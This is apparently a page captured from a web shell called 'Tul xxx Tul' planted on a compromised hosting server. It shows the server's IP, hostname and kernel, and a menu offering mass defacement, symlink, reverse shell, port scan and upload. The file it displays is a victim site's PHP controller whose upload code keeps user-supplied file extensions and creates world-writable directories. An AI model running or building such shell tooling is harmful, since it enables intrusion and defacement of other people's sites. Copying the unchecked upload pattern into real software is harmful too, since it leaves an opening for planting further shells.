Tul xxx Tul
User / IP
:
216.73.216.159
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
emprendo.com.co
/
public_html2
/
cuentame
/
controllers
/
Viewing: PanelController.php
<?php require_once '../cuentame/core/Controller.php'; require_once '../cuentame/models/Emprendimiento.php'; require_once __DIR__ . '/../core/Helper.php'; class PanelController extends Controller { public function __construct() { session_start(); if (!isset($_SESSION['user_id'])) { header('Location: ' . Helper::asset('index.html')); exit; } require_once __DIR__ . '/../models/User.php'; $userModel = new User(); $role = $userModel->getRole($_SESSION['user_id']); if ($role === 'admin') { header('Location: ' . Helper::appUrl('admin/dashboard')); exit; } } public function index() { require_once '../cuentame/models/User.php'; require_once '../cuentame/models/Project.php'; require_once '../cuentame/models/Transaction.php'; require_once '../cuentame/models/Payment.php'; require_once '../cuentame/models/Activity.php'; // Eliminar require_once '../cuentame/models/Chat.php'; y todo el uso de $chatModel, $conversation, $messages, $chatStats y funciones relacionadas con chat en el método index y otros métodos relacionados con chat. $projects = (new Project())->getByUser($_SESSION['user_id']); $transactions = (new Transaction())->getByUser($_SESSION['user_id']); $payments = (new Payment())->getByUser($_SESSION['user_id']); // Obtener actividades del usuario $activityModel = new Activity(); $activities = $activityModel->getByUser($_SESSION['user_id']); $todayActivities = $activityModel->getTodayActivities($_SESSION['user_id']); $weekActivities = $activityModel->getWeekActivities($_SESSION['user_id']); $monthActivities = $activityModel->getMonthActivities($_SESSION['user_id']); $activityStats = $activityModel->getStats($_SESSION['user_id']); // Obtener estadísticas detalladas del usuario $paymentModel = new Payment(); $userStats = $paymentModel->getUserStats($_SESSION['user_id']); // Eliminar require_once '../cuentame/models/Chat.php'; y todo el uso de $chatModel, $conversation, $messages, $chatStats y funciones relacionadas con chat en el método index y otros métodos relacionados con chat. $data = [ 'user_name' => $_SESSION['user_name'] ?? 'Usuario', 'projects' => $projects, 'transactions' => $transactions, 'payments' => $payments, 'activities' => $activities, 'today_activities' => $todayActivities, 'week_activities' => $weekActivities, 'month_activities' => $monthActivities, 'activity_stats' => $activityStats, 'available_balance' => $userStats['available_balance'], 'user_stats' => $userStats, // Eliminar require_once '../cuentame/models/Chat.php'; y todo el uso de $chatModel, $conversation, $messages, $chatStats y funciones relacionadas con chat en el método index y otros métodos relacionados con chat. ]; // Obtener datos del usuario para el modal de perfil $userModel = $this->model('User'); $user = $userModel->findById($_SESSION['user_id']); $data['user_email'] = $user['email'] ?? ''; $data['profile_image'] = $user['profile_image'] ?? '/emprendo/assets/img/user-default.png'; $data['company_logo'] = $user['company_logo'] ?? '/emprendo/assets/img/logo-blanco.png'; // Obtener emprendimientos del usuario // $emprendimientoModel = new Emprendimiento(); // $data['emprendimientos'] = $emprendimientoModel->getByUser($_SESSION['user_id']); // Manejo de actividades del cliente if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action']) && $_POST['action'] === 'respond_invitation') { $activity_id = $_POST['activity_id']; $status = $_POST['status']; // 'confirmed' o 'declined' if ($activityModel->respondToInvitation($activity_id, $_SESSION['user_id'], $status)) { $_SESSION['success_message'] = 'invitation_responded'; header('Location: ' . Helper::appUrl('clientes')); } else { $_SESSION['error_message'] = 'invitation_response_failed'; header('Location: ' . Helper::appUrl('clientes')); } exit; } // Manejo de pagos del cliente if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action']) && $_POST['action'] === 'create_payment') { $paymentData = [ 'user_id' => $_SESSION['user_id'], 'amount' => $_POST['amount'], 'payment_method' => $_POST['payment_method'], 'reference' => $_POST['reference'] ?? '', 'description' => $_POST['description'] ?? '', 'status' => 'Pendiente', // Los clientes solo pueden crear pagos pendientes 'payment_date' => $_POST['payment_date'] ?? date('Y-m-d') ]; if ((new Payment())->create($paymentData)) { $_SESSION['success_message'] = 'payment_created'; header('Location: ' . Helper::appUrl('clientes')); } else { $_SESSION['error_message'] = 'payment_creation_failed'; header('Location: ' . Helper::appUrl('clientes')); } exit; } // Manejo de actualización de perfil if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['name'], $_POST['email'])) { $user_id = $_SESSION['user_id']; $name = $_POST['name']; $email = $_POST['email']; $profile_image = $data['profile_image'] ?? null; $company_logo = $data['company_logo'] ?? null; // Subida de imagen de perfil if (isset($_FILES['profile_image']) && $_FILES['profile_image']['error'] === UPLOAD_ERR_OK) { $ext = pathinfo($_FILES['profile_image']['name'], PATHINFO_EXTENSION); $profile_dir = __DIR__ . '/../../uploads/profile_images/'; if (!is_dir($profile_dir)) mkdir($profile_dir, 0777, true); $profile_image_name = 'user_' . $user_id . '_' . time() . '.' . $ext; $profile_path = $profile_dir . $profile_image_name; if (move_uploaded_file($_FILES['profile_image']['tmp_name'], $profile_path)) { $profile_image = '/emprendo/uploads/profile_images/' . $profile_image_name; } } // Subida de logo de empresa if (isset($_FILES['company_logo']) && $_FILES['company_logo']['error'] === UPLOAD_ERR_OK) { $ext = pathinfo($_FILES['company_logo']['name'], PATHINFO_EXTENSION); $logo_dir = __DIR__ . '/../../uploads/company_logos/'; if (!is_dir($logo_dir)) mkdir($logo_dir, 0777, true); $logo_image_name = 'logo_' . $user_id . '_' . time() . '.' . $ext; $logo_path = $logo_dir . $logo_image_name; if (move_uploaded_file($_FILES['company_logo']['tmp_name'], $logo_path)) { $company_logo = '/emprendo/uploads/company_logos/' . $logo_image_name; } } // Actualizar en la base de datos $userModel = $this->model('User'); // Nota: usar método extendido para soportar company_logo y mantener teléfono si llega if ($userModel->updateProfileFull($user_id, $name, $email, $_POST['telefono'] ?? null, $profile_image, $company_logo)) { // Refrescar datos en $data $_SESSION['user_name'] = $name; $data['user_name'] = $name; $data['user_email'] = $email; $data['profile_image'] = $profile_image; $data['company_logo'] = $company_logo; // Guardar mensaje de éxito en sesión $_SESSION['success_message'] = 'profile_updated'; } else { // Error: email ya existe para otro usuario $_SESSION['error_message'] = 'email_already_exists'; } // Redirigir para evitar reenvío de formulario header('Location: ' . Helper::appUrl('clientes')); exit; } $this->view('panel/index', $data); } // Métodos para el chat del cliente public function sendMessage() { // Eliminar require_once '../cuentame/controllers/ChatController.php'; // Eliminar $this->validateChatAccess('cliente'); // Eliminar $this->sendMessageInternal(); // Eliminar $this->validateChatAccess('cliente'); // Eliminar $this->getMessagesInternal(); // Eliminar http_response_code(403); // Eliminar echo json_encode(['success' => false, 'error' => 'Acceso denegado para enviar mensajes.']); // Eliminar return; // Eliminar http_response_code(403); // Eliminar echo json_encode(['error' => 'Acceso denegado al chat para clientes.']); // Eliminar return; } public function getMessages() { // Eliminar require_once '../cuentame/controllers/ChatController.php'; // Eliminar $this->validateChatAccess('cliente'); // Eliminar $this->getMessagesInternal(); } }
Coded With 💗 by
0x6ick